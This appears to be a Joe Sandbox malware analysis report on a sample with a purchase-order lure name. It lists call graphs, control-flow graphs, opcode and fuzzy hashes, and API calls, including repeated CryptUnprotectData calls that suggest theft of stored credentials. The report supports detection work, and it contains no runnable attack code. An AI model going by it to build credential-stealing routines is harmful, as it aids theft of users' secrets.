43542 36b2248b 43540->43542 43541->43542 43542->43538 43543 36b22020 SetTimer 43544 36b2208c 43543->43544 43261 11b158 43262 11b174 43261->43262 43269 36a50188 43262->43269 43273 36a50198 43262->43273 43266 11b1a3 43277 36b22730 43266->43277 43283 36b22720 43266->43283 43270 36a50198 43269->43270 43289 36a5c638 43270->43289 43271 36a501da 43271->43266 43274 36a501a4 43273->43274 43276 36a5c638 CryptUnprotectData 43274->43276 43275 36a501da 43275->43266 43276->43275 43278 36b2273f 43277->43278 43321 36b20938 43278->43321 43284 36b2273f 43283->43284 43285 36b20938 10 API calls 43284->43285 43286 36b22746 43285->43286 43287 36b2188c 14 API calls 43286->43287 43288 11b1b1 43287->43288 43291 36a5c631 43289->43291 43290 36a5caf9 43290->43271 43291->43289 43291->43290 43293 36a5cf01 43291->43293 43294 36a5cf10 43293->43294 43298 36a5d540 43294->43298 43306 36a5d550 43294->43306 43295 36a5cf80 43295->43291 43299 36a5d575 43298->43299 43300 36a5d629 43298->43300 43299->43300 43304 36a5d540 CryptUnprotectData 43299->43304 43305 36a5d550 CryptUnprotectData 43299->43305 43314 36a5d730 43299->43314 43318 36a5d1ec 43300->43318 43304->43300 43305->43300 43307 36a5d575 43306->43307 43308 36a5d629 43306->43308 43307->43308 43311 36a5d730 CryptUnprotectData 43307->43311 43312 36a5d540 CryptUnprotectData 43307->43312 43313 36a5d550 CryptUnprotectData 43307->43313 43309 36a5d1ec CryptUnprotectData 43308->43309 43310 36a5d7f5 43309->43310 43310->43295 43311->43308 43312->43308 43313->43308 43315 36a5d745 43314->43315 43316 36a5d1ec CryptUnprotectData 43315->43316 43317 36a5d7f5 43316->43317 43317->43300 43319 36a5d9e0 CryptUnprotectData 43318->43319 43320 36a5d7f5 43319->43320 43320->43295 43322 36b20948 43321->43322 43323 36b20965 43322->43323 43330 36b20980 43322->43330 43342 36b20970 43322->43342 43326 36b2188c 43323->43326 43328 36b21897 43326->43328 43329 36b22866 43328->43329 43364 36b21934 43328->43364 43331 36b209c6 GetCurrentProcess 43330->43331 43333 36b20a11 43331->43333 43334 36b20a18 GetCurrentThread 43331->43334 43333->43334 43335 36b20a55 GetCurrentProcess 43334->43335 43336 36b20a4e 43334->43336 43337 36b20a8b 43335->43337 43336->43335 43354 36b20f31 43337->43354 43356 36b20b4f 43337->43356 43338 36b20ab3 GetCurrentThreadId 43339 36b20ae4 43338->43339 43339->43323 43343 36b20980 GetCurrentProcess 43342->43343 43345 36b20a11 43343->43345 43346 36b20a18 GetCurrentThread 43343->43346 43345->43346 43347 36b20a55 GetCurrentProcess 43346->43347 43348 36b20a4e 43346->43348 43349 36b20a8b 43347->43349 43348->43347 43352 36b20f31 43349->43352 43353 36b20b4f 2 API calls 43349->43353 43350 36b20ab3 GetCurrentThreadId 43351 36b20ae4 43350->43351 43351->43323 43352->43350 43353->43350 43355 36b20f3a 43354->43355 43355->43338 43360 36b20bc0 DuplicateHandle 43356->43360 43362 36b20bc8 DuplicateHandle 43356->43362 43357 36b20b8e 43357->43338 43361 36b20c5e 43360->43361 43361->43357 43363 36b20c5e 43362->43363 43363->43357 43369 36b2193f 43364->43369 43365 36b22e79 43366 36b22ea9 43365->43366 43367 36b22ac4 11 API calls 43365->43367 43371 36b22ed4 43366->43371 43385 36b22ac4 43366->43385 43367->43366 43369->43365 43369->43371 43375 36b23e32 43369->43375 43380 36b23e40 43369->43380 43370 36b22ec1 43370->43371 43391 36b2d6c1 43370->43391 43371->43328 43377 36b23e61 43375->43377 43376 36b23e85 43376->43365 43377->43376 43395 36b23ff0 43377->43395 43401 36b23fe0 43377->43401 43381 36b23e61 43380->43381 43382 36b23e85 43381->43382 43383 36b23ff0 13 API calls 43381->43383 43384 36b23fe0 13 API calls 43381->43384 43382->43365 43383->43382 43384->43382 43386 36b22acf 43385->43386 43387 36b20938 10 API calls 43386->43387 43390 36b2d0a1 43386->43390 43388 36b2d0bb 43387->43388 43455 36b2c544 43388->43455 43390->43370 43392 36b2d6f1 43391->43392 43393 36b20938 10 API calls 43392->43393 43394 36b2d77c 43392->43394 43393->43394 43397 36b23ffd 43395->43397 43396 36b20938 10 API calls 43398 36b2402b 43396->43398 43397->43396 43399 36b24036 43398->43399 43407 36b22bec 43398->43407 43399->43376 43404 36b23ffd 43401->43404 43402 36b20938 10 API calls 43403 36b2402b 43402->43403 43405 36b22bec 13 API calls 43403->43405 43406 36b24036 43403->43406 43404->43402 43405->43406 43406->43376 43408 36b22bf7 43407->43408 43410 36b240a8 43408->43410 43411 36b22c20 43408->43411 43410->43410 43412 36b22c2b 43411->43412 43427 36b22c30 43412->43427 43415 36b24526 43416 36b240f8 CreateWindowExW CreateWindowExW CreateWindowExW 43415->43416 43417 36b24540 43416->43417 43418 36b24108 CreateWindowExW CreateWindowExW CreateWindowExW 43417->43418 43419 36b24547 43418->43419 43423 36b291f0 CreateWindowExW CreateWindowExW CreateWindowExW 43419->43423 43424 36b28400 CreateWindowExW CreateWindowExW CreateWindowExW 43419->43424 43425 36b29067 CreateWindowExW CreateWindowExW CreateWindowExW 43419->43425 43426 36b291d8 CreateWindowExW CreateWindowExW CreateWindowExW 43419->43426 43420 36b24551 43420->43410 43423->43420 43424->43420 43425->43420 43426->43420 43428 36b22c3b 43427->43428 43429 36b24517 43428->43429 43430 36b23e40 13 API calls 43428->43430 43431 36b275cd 43429->43431 43437 36b273c8 43429->43437 43430->43429 43432 36b275ea 43431->43432 43433 36b27700 43432->43433 43443 36b28060 43432->43443 43447 36b2804f 43432->43447 43434 36b276d3 43434->43434 43439 36b27406 43437->43439 43438 36b27700 43439->43438 43441 36b28060 3 API calls 43439->43441 43442 36b2804f 3 API calls 43439->43442 43440 36b276d3 43440->43440 43441->43440 43442->43440 43444 36b2807d 43443->43444 43446 36b280c1 43444->43446 43451 36b24108 43444->43451 43446->43434 43449 36b28060 43447->43449 43448 36b280c1 43448->43434 43449->43448 43450 36b24108 3 API calls 43449->43450 43450->43448 43452 36b24113 43451->43452 43453 36b28400 CreateWindowExW CreateWindowExW CreateWindowExW 43452->43453 43454 36b2901f 43453->43454 43454->43446 43456 36b2c54f 43455->43456 43457 36b2d3bb 43456->43457 43459 36b2c560 43456->43459 43457->43390 43460 36b2d3f0 OleInitialize 43459->43460 43461 36b2d454 43460->43461 43461->43457 43545 ad030 43546 ad048 43545->43546 43547 ad0a2 43546->43547 43553 36b202c8 43546->43553 43558 36b202b7 43546->43558 43563 36b21bc0 43546->43563 43568 36b21bd0 43546->43568 43573 36b203f0 43546->43573 43554 36b202ee 43553->43554 43556 36b21bd0 3 API calls 43554->43556 43557 36b21bc0 3 API calls 43554->43557 43555 36b2030f 43555->43547 43556->43555 43557->43555 43559 36b202ee 43558->43559 43561 36b21bd0 3 API calls 43559->43561 43562 36b21bc0 3 API calls 43559->43562 43560 36b2030f 43560->43547 43561->43560 43562->43560 43564 36b21bfd 43563->43564 43565 36b21c2f 43564->43565 43576 36b21d58 43564->43576 43586 36b21d48 43564->43586 43569 36b21bfd 43568->43569 43570 36b21c2f 43569->43570 43571 36b21d58 3 API calls 43569->43571 43572 36b21d48 3 API calls 43569->43572 43571->43570 43572->43570 43574 36b20407 43573->43574 43604 36b20841 43573->43604 43574->43547 43577 36b21d93 43576->43577 43578 36b21d66 43576->43578 43577->43578 43580 36b21d98 43577->43580 43579 36b21d6e 43578->43579 43596 36b21dc0 43578->43596 43600 36b21db1 43578->43600 43579->43565 43581 36b217d0 GetCurrentThreadId 43580->43581 43583 36b21da4 43581->43583 43582 36b21dac 43582->43565 43583->43565 43587 36b21d93 43586->43587 43588 36b21d66 43586->43588 43587->43588 43589 36b21d98 43587->43589 43592 36b21d6e 43588->43592 43594 36b21dc0 CallWindowProcW 43588->43594 43595 36b21db1 CallWindowProcW 43588->43595 43590 36b217d0 GetCurrentThreadId 43589->43590 43593 36b21da4 43590->43593 43591 36b21dac 43591->43565 43592->43565 43593->43565 43594->43591 43595->43591 43597 36b21e02 43596->43597 43599 36b21e09 43596->43599 43598 36b21e5a CallWindowProcW 43597->43598 43597->43599 43598->43599 43599->43582 43601 36b21dba 43600->43601 43602 36b21e09 43600->43602 43601->43602 43603 36b21e5a CallWindowProcW 43601->43603 43602->43582 43603->43602 43605 36b20856 43604->43605 43606 36b20938 10 API calls 43604->43606 43605->43574 43606->43605
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $$(o^q$4'^q$4'^q$4'^q
                                                                                                            • API String ID: 0-1088173512
                                                                                                            • Opcode ID: dcfd8267b34879b47f1a5e3db4e1343e82192b6331707d679026addc15afd98c
                                                                                                            • Instruction ID: 52ca61042ba0dff1acd3e879d294474bc5e087da1e84cbd2fa72e6ca954f41af
                                                                                                            • Opcode Fuzzy Hash: dcfd8267b34879b47f1a5e3db4e1343e82192b6331707d679026addc15afd98c
                                                                                                            • Instruction Fuzzy Hash: 86A27E70A04209DFCB19CF68D9A4AEEBBF2BF88300F158569E415DB261D731ED85CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 632 115f90-115fc6 760 115fc8 call 115f90 632->760 761 115fc8 call 1160e0 632->761 762 115fc8 call 115968 632->762 633 115fce-115fd4 634 116024-116028 633->634 635 115fd6-115fda 633->635 636 11602a-116039 634->636 637 11603f-116053 634->637 638 115fe9-115ff0 635->638 639 115fdc-115fe1 635->639 640 116065-11606f 636->640 641 11603b-11603d 636->641 642 11605b-116062 637->642 757 116055 call 118d90 637->757 758 116055 call 118da0 637->758 759 116055 call 1190a8 637->759 643 1160c6-116103 638->643 644 115ff6-115ffd 638->644 639->638 645 116071-116077 640->645 646 116079-11607d 640->646 641->642 654 116105-11610b 643->654 655 11610e-11612e 643->655 644->634 647 115fff-116003 644->647 650 116085-1160bf 645->650 646->650 652 11607f 646->652 648 116012-116019 647->648 649 116005-11600a 647->649 648->643 653 11601f-116022 648->653 649->648 650->643 652->650 653->642 654->655 661 116130 655->661 662 116135-11613c 655->662 663 1164c4-1164cd 661->663 664 11613e-116149 662->664 666 1164d5-1164e2 664->666 667 11614f-116162 664->667 671 116164-116172 667->671 672 116178-116193 667->672 671->672 675 11644c-116453 671->675 676 116195-11619b 672->676 677 1161b7-1161ba 672->677 675->663 682 116455-116457 675->682 680 1161a4-1161a7 676->680 681 11619d 676->681 678 1161c0-1161c3 677->678 679 116314-11631a 677->679 678->679 685 1161c9-1161cf 678->685 683 116320-116325 679->683 684 116406-116409 679->684 686 1161da-1161e0 680->686 687 1161a9-1161ac 680->687 681->679 681->680 681->684 681->686 688 116466-11646c 682->688 689 116459-11645e 682->689 683->684 692 1164d0 684->692 693 11640f-116415 684->693 685->679 691 1161d5 685->691 694 1161e2-1161e4 686->694 695 1161e6-1161e8 686->695 696 1161b2 687->696 697 116246-11624c 687->697 688->666 690 11646e-116473 688->690 689->688 698 116475-11647a 690->698 699 1164b8-1164bb 690->699 691->684 692->666 701 116417-11641f 693->701 702 11643a-11643e 693->702 703 1161f2-1161fb 694->703 695->703 696->684 697->684 700 116252-116258 697->700 698->692 704 11647c 698->704 699->692 711 1164bd-1164c2 699->711 705 11625a-11625c 700->705 706 11625e-116260 700->706 701->666 707 116425-116434 701->707 702->675 710 116440-116446 702->710 708 1161fd-116208 703->708 709 11620e-116236 703->709 712 116483-116488 704->712 713 11626a-116281 705->713 706->713 707->672 707->702 708->684 708->709 731 11632a-116360 709->731 732 11623c-116241 709->732 710->664 710->675 711->663 711->682 714 1164aa-1164ac 712->714 715 11648a-11648c 712->715 725 116283-11629c 713->725 726 1162ac-1162d3 713->726 714->692 722 1164ae-1164b1 714->722 719 11649b-1164a1 715->719 720 11648e-116493 715->720 719->666 724 1164a3-1164a8 719->724 720->719 722->699 724->714 727 11647e-116481 724->727 725->731 735 1162a2-1162a7 725->735 726->692 737 1162d9-1162dc 726->737 727->692 727->712 738 116362-116366 731->738 739 11636d-116375 731->739 732->731 735->731 737->692 740 1162e2-11630b 737->740 741 116385-116389 738->741 742 116368-11636b 738->742 739->692 743 11637b-116380 739->743 740->731 755 11630d-116312 740->755 744 1163a8-1163ac 741->744 745 11638b-116391 741->745 742->739 742->741 743->684 748 1163b6-1163d5 call 1166b8 744->748 749 1163ae-1163b4 744->749 745->744 747 116393-11639b 745->747 747->692 750 1163a1-1163a6 747->750 752 1163db-1163df 748->752 749->748 749->752 750->684 752->684 753 1163e1-1163fd 752->753 753->684 755->731 757->642 758->642 759->642 760->633 761->633 762->633
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o^q$(o^q$,bq$,bq
                                                                                                            • API String ID: 0-879173519
                                                                                                            • Opcode ID: 49064561308510769877a169afd90c0bc1c46b59fc8d34cf40eba7ec4a5fe712
                                                                                                            • Instruction ID: f862df6bfc14d89419f15f67e8b9d4e0e54c4faa4a9b3243c4deb815253aef12
                                                                                                            • Opcode Fuzzy Hash: 49064561308510769877a169afd90c0bc1c46b59fc8d34cf40eba7ec4a5fe712
                                                                                                            • Instruction Fuzzy Hash: 97022070A00119DFCB18CF69C984AEEBBF2FF98355F158069E815AB661DB32DD81CB50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1590 1127b9-1127e4 1591 112805-112858 1590->1591 1592 1127e6-112804 1590->1592 1594 11287a-1128f0 1591->1594 1595 11285a-112878 1591->1595 1592->1591 1596 112912-112918 1594->1596 1597 1128f2-112910 1594->1597 1595->1594 1598 11291a-11292c 1596->1598 1599 11293c 1596->1599 1597->1596 1602 11294e-112955 1598->1602 1603 11292e-112934 1598->1603 1600 11295e-112978 1599->1600 1601 11293e-11294d 1599->1601 1605 11299a-11299d 1600->1605 1606 11297a-11297c 1600->1606 1601->1602 1604 112956-11295c 1602->1604 1603->1604 1607 112936-11293a 1603->1607 1604->1600 1608 11299e-1129a1 1605->1608 1606->1608 1609 11297e-112980 1606->1609 1607->1599 1610 1129a2-1129a4 1608->1610 1609->1610 1611 112982-112984 1609->1611 1612 1129a6-1129a8 1610->1612 1611->1612 1613 112986-112988 1611->1613 1614 1129aa-112a54 1612->1614 1613->1614 1615 11298a-112999 1613->1615 1617 112a56-112a77 1614->1617 1618 112a79-112b38 1614->1618 1615->1605 1617->1618 1619 112b3a-112b5b 1618->1619 1620 112b5d-112c50 1618->1620 1619->1620 1621 112c52-112c76 call 114664 1620->1621 1622 112c77-112ca1 1620->1622 1621->1622 1626 112ca3-112ca5 1622->1626 1627 112cb2-112cba 1622->1627 1629 112ca7-112ca9 1626->1629 1630 112cab-112cb0 1626->1630 1632 112cbc-112cca 1627->1632 1629->1632 1630->1632 1634 112ce0-112ce8 1632->1634 1635 112ccc-112cce 1632->1635 1638 112ceb-112cee 1634->1638 1636 112cd0-112cd5 1635->1636 1637 112cd7-112cde 1635->1637 1636->1638 1637->1638 1640 112cf0-112cfe 1638->1640 1641 112d05-112d09 1638->1641 1640->1641 1649 112d00 1640->1649 1642 112d22-112d25 1641->1642 1643 112d0b-112d19 1641->1643 1644 112d27-112d2b 1642->1644 1645 112d2d-112d62 1642->1645 1643->1642 1652 112d1b 1643->1652 1644->1645 1648 112d64-112d7b 1644->1648 1654 112dc4-112dc9 1645->1654 1650 112d81-112d8d 1648->1650 1651 112d7d-112d7f 1648->1651 1649->1641 1655 112d97-112da1 1650->1655 1656 112d8f-112d95 1650->1656 1651->1654 1652->1642 1657 112da9 1655->1657 1658 112da3 1655->1658 1656->1657 1660 112db1-112dbd 1657->1660 1658->1657 1660->1654
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Xbq$Xbq
                                                                                                            • API String ID: 0-1243427068
                                                                                                            • Opcode ID: b4ff864ca29bcf2035361c41dc7c53737e7a3b92c0bcabd87f7c80ffdf7f75a2
                                                                                                            • Instruction ID: f1367cf11aac3904b383ddcf936f7b695a1ca35b40ac06c4d8d16822954a5370
                                                                                                            • Opcode Fuzzy Hash: b4ff864ca29bcf2035361c41dc7c53737e7a3b92c0bcabd87f7c80ffdf7f75a2
                                                                                                            • Instruction Fuzzy Hash: F642093295E3A59FD7874B348CA41903BB1BF5B20539E08EAD8C18F467F6650E87CB25
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o^q$Hbq
                                                                                                            • API String ID: 0-662517225
                                                                                                            • Opcode ID: 379f173dcfafc4203875dcae6323f2c75c9f13e79f27af0663283863aac68565
                                                                                                            • Instruction ID: d6a8a7f19f0b4ac3e4549807ac5c31e5ff6ef8a166a9013898d209eeecac34ee
                                                                                                            • Opcode Fuzzy Hash: 379f173dcfafc4203875dcae6323f2c75c9f13e79f27af0663283863aac68565
                                                                                                            • Instruction Fuzzy Hash: 59125E70A006199FDB18DFA9D854AAEBBF6BFC8300F148569E505DB391DB349D82CB90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2163 114328-114368 2165 11436a 2163->2165 2166 11436f-11444c call 113168 call 112c88 2163->2166 2165->2166 2176 114453-114471 2166->2176 2177 11444e 2166->2177 2207 114474 call 114611 2176->2207 2208 114474 call 114620 2176->2208 2209 114474 call 114664 2176->2209 2177->2176 2178 11447a-114485 2179 114487 2178->2179 2180 11448c-114490 2178->2180 2179->2180 2181 114492-114493 2180->2181 2182 114495-11449c 2180->2182 2183 1144b4-1144f8 2181->2183 2184 1144a3-1144b1 2182->2184 2185 11449e 2182->2185 2189 11455e-114575 2183->2189 2184->2183 2185->2184 2191 114577-11459c 2189->2191 2192 1144fa-114510 2189->2192 2198 1145b4 2191->2198 2199 11459e-1145b3 2191->2199 2196 114512-11451e 2192->2196 2197 11453a 2192->2197 2200 114520-114526 2196->2200 2201 114528-11452e 2196->2201 2202 114540-11455d 2197->2202 2199->2198 2203 114538 2200->2203 2201->2203 2202->2189 2203->2202 2207->2178 2208->2178 2209->2178
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q$PH^q
                                                                                                            • API String ID: 0-1598597984
                                                                                                            • Opcode ID: 1d6791f2d8e832a066a09e75b4d406c4a2f485aae5fb7494baaf7a96b5af1da6
                                                                                                            • Instruction ID: c0621cd4e4c88fae9e1d1f1a7a1191cfd7372ab5fd704574a9bfb9130d92a2ac
                                                                                                            • Opcode Fuzzy Hash: 1d6791f2d8e832a066a09e75b4d406c4a2f485aae5fb7494baaf7a96b5af1da6
                                                                                                            • Instruction Fuzzy Hash: 4891B374E00258CFDB58DFA9D894ADDBBF2BF89300F148069E819AB365DB349985CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te^q
                                                                                                            • API String ID: 0-671973202
                                                                                                            • Opcode ID: 42cb46550d70e23bcf4f9710900fa4176310ce80da0d6a73fbad6e8ec505d0fb
                                                                                                            • Instruction ID: a38f0a073cd5f03a594ec786a69d294193a97b018273b8b7dd62b54bb7453c45
                                                                                                            • Opcode Fuzzy Hash: 42cb46550d70e23bcf4f9710900fa4176310ce80da0d6a73fbad6e8ec505d0fb
                                                                                                            • Instruction Fuzzy Hash: 9082AF74A10228CFDB25DF64D994BA9BBB2FB89301F1085E9D909B7350CB359E82DF40
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te^q
                                                                                                            • API String ID: 0-671973202
                                                                                                            • Opcode ID: 55ececc9ddd45f3f99fda188f94386657dc753478b6fc5cc81685fe770153c4e
                                                                                                            • Instruction ID: 2902f904ea71ed0e5d3ad08661824bdade23b937aab1018db7bb0329a236f82e
                                                                                                            • Opcode Fuzzy Hash: 55ececc9ddd45f3f99fda188f94386657dc753478b6fc5cc81685fe770153c4e
                                                                                                            • Instruction Fuzzy Hash: C172C174A10228DFDB25DF64D994BA9BBB2FB89301F1084E9D90977360CB359E82DF50
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000AF,?,00000000,?,?,?,?), ref: 36A5DA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: c79ba51c3957bbebe67b129c81af2402d6a8e744a49172c2f3774c286b750107
                                                                                                            • Instruction ID: b45565aace7b84874e9affd66ec743b300d356ca53d4eff3278f5b72a5faca10
                                                                                                            • Opcode Fuzzy Hash: c79ba51c3957bbebe67b129c81af2402d6a8e744a49172c2f3774c286b750107
                                                                                                            • Instruction Fuzzy Hash: BC1167B68002499FCB10DF9AC805BDEBFF5EF48320F158419EA58A7211C739A950DFA5
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000AF,?,00000000,?,?,?,?), ref: 36A5DA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: 720d009ee5958e76442b652494ac1051719839f8b7825883ace738731937a9b6
                                                                                                            • Instruction ID: 5cfe5df65e4d9b215f8af1456b57f8f97527b2a8c2ff0c318b07a53e4722320b
                                                                                                            • Opcode Fuzzy Hash: 720d009ee5958e76442b652494ac1051719839f8b7825883ace738731937a9b6
                                                                                                            • Instruction Fuzzy Hash: 6F1144B28003499FDB10DF99C805BDEBFF4EB48320F118419EA58A7210C739A950DFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b58e5643780784be8253058337295ce297c720813bc80c29cef6ca2b8e7b55ad
                                                                                                            • Instruction ID: 995d0a6316cb48c531edb02698c391e17f62aa532e602dee972b57784eb32ace
                                                                                                            • Opcode Fuzzy Hash: b58e5643780784be8253058337295ce297c720813bc80c29cef6ca2b8e7b55ad
                                                                                                            • Instruction Fuzzy Hash: 6D72BE74E012298FEB64DF69C994BD9BBB2BB49304F5091E9D40CAB351DB319E82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5a920fcd8dd48753a8bd83a722ea9f66578a3358fc863d2fd83ec9f47318c7e2
                                                                                                            • Instruction ID: ef184119b9c9bfc8ef2cdb8fcc0c92cce54da500ba7dbcea221c0a0dc42ce656
                                                                                                            • Opcode Fuzzy Hash: 5a920fcd8dd48753a8bd83a722ea9f66578a3358fc863d2fd83ec9f47318c7e2
                                                                                                            • Instruction Fuzzy Hash: 6FE1F174E01218CFEB14CFA5C944B9DBBB2BF89304F2080A9D949BB395DB355A86CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8862d47b5dbd8ff681af2c2b0a6c9ff15f47a427ea8ac421cc88c294c67c8d93
                                                                                                            • Instruction ID: 2d69885d06b93beb51829813c40076e13f7a77de54c3a662d279e194f2684823
                                                                                                            • Opcode Fuzzy Hash: 8862d47b5dbd8ff681af2c2b0a6c9ff15f47a427ea8ac421cc88c294c67c8d93
                                                                                                            • Instruction Fuzzy Hash: E8D19C74E01218CFDB14DFA5C994B9DBBB2FB88301F2080A9D909BB355DB359A82DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4d5f2c7690ee792c6c7822b55c1a0af6d38e3f56dc4ad2745acc4b1085670f6c
                                                                                                            • Instruction ID: c4baf26c10371b77ac9143b07d95a11973d808aa2a55aa13b6451bf696ab3f40
                                                                                                            • Opcode Fuzzy Hash: 4d5f2c7690ee792c6c7822b55c1a0af6d38e3f56dc4ad2745acc4b1085670f6c
                                                                                                            • Instruction Fuzzy Hash: A2A1F370E002088FEB10DFA9C994BDDBBB1FF89314F208269E548AB391DB749985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e8023db5c99bd2004c70bfdd4a572e6d0a9c648a1109a4f399c2352fe49cba91
                                                                                                            • Instruction ID: 2b1809556c2c9ed5d28b53ced6473f7043b78d60d11e697ae6d9ffd1ec57eef7
                                                                                                            • Opcode Fuzzy Hash: e8023db5c99bd2004c70bfdd4a572e6d0a9c648a1109a4f399c2352fe49cba91
                                                                                                            • Instruction Fuzzy Hash: 15A1F370E002088FEB10DFA9C994BDDBBB1FF89314F209269E548AB391DB749985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5815315f370075e45e5fa84385fa36274d20221eac712211fb026fa47e6bdf7c
                                                                                                            • Instruction ID: 90d55a3deb5734c45d7a8dc9c7739c9b1a52cb9e2efcca8971dc13a9db067641
